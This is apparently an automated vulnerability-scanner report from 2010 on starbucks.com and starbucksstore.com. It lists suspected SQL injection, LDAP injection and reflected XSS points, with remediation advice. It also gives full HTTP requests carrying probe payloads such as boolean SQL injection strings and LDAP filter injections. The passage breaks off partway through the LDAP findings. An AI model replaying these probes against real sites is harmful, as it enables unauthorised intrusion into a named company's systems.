Report generated by HOYT LLC at Tue Nov 16 13:25:22 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.



1. SQL injection

1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

1.3. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

2. LDAP injection

2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

3. Cross-site scripting (reflected)

3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

3.37. http://www.starbucks.com/search [keywords parameter]

3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

3.40. http://www.starbucksstore.com/ [CookingAd cookie]

3.41. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

3.42. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

3.43. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

3.44. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

3.45. http://www.starbucksstore.com/coffee [CookingAd cookie]

3.46. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

3.47. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

3.48. http://www.starbucksstore.com/default.asp [CookingAd cookie]

3.49. http://www.starbucksstore.com/entertainment [CookingAd cookie]

3.50. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

3.51. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

3.52. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

3.53. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

3.54. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

3.55. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

3.56. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

3.57. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

3.58. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

3.59. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

3.60. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.61. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.62. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

3.63. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

3.64. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

3.65. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

3.66. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

3.67. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

3.68. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

3.69. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

3.70. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

3.71. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

3.72. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

3.73. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

3.74. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

3.75. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

3.76. http://www.starbucksstore.com/tea [CookingAd cookie]

4. Open redirection



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:35 GMT
Connection: close
Content-Length: 52660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi">
                   <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" />
                   <br /><strong><span>Aged Sulawesi Kalosi</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry">
                   <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" />
                   <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos
...[SNIP]...

Request 2

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:38 GMT
Connection: close
Content-Length: 51704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos-san-cristobal" title="Gal..pagos San Crist..bal">
                   <img src="http://assets.starbucks.com/assets/4d25963349584f26a7d3f9ac787313e9.jpg" alt="Galapagos San Cristobal" />
                   <br /><strong><span>Gal..pagos San Crist..bal</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
       </ol>
   </div>


   <div class="section" id="posts">


<div id="blog-603" class="blog-entry">
<h2><a href="/blog/The-New-Starbucks-Reservee284a2-Coffees">The New Starbucks Reserve... Coffees</a></h2>
<ul class="heading">
<li class="byline">
           <p class="postdate">October 05, 2010</p>
<p>Posted by Jason S., coffee engagement manager</p>
</li>
<li class="comment-num"><a href="/blog/the-new-starbucks-reservee284a2-coffees#blog-comments"><span class="comment-count">0</span> Comments</a></li>
</ul>

...[SNIP]...

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/christmas-blend" title="Christmas Blend">
                           <img src="http://assets.starbucks.com/assets/e9a91915e04244bf99f8a97ed289c558.jpg" alt="Starbucks VIA.. Christmas Blend" />
                           <br /><strong><span>Christmas Blend</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec
...[SNIP]...

Request 2

GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" />
                           <br /><strong><span>Decaf Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
               </ol>
       </div>
       

       <div class="section" id="posts">


<div id="blog-602" class="blog-entry">
<h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI
...[SNIP]...

1.3. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:25 GMT
Connection: close
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 168
Content-Type: text/html
Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&amp;Redir=/coffee/">here</a>.</body>

2. LDAP injection
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#');">
</td><td style="
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
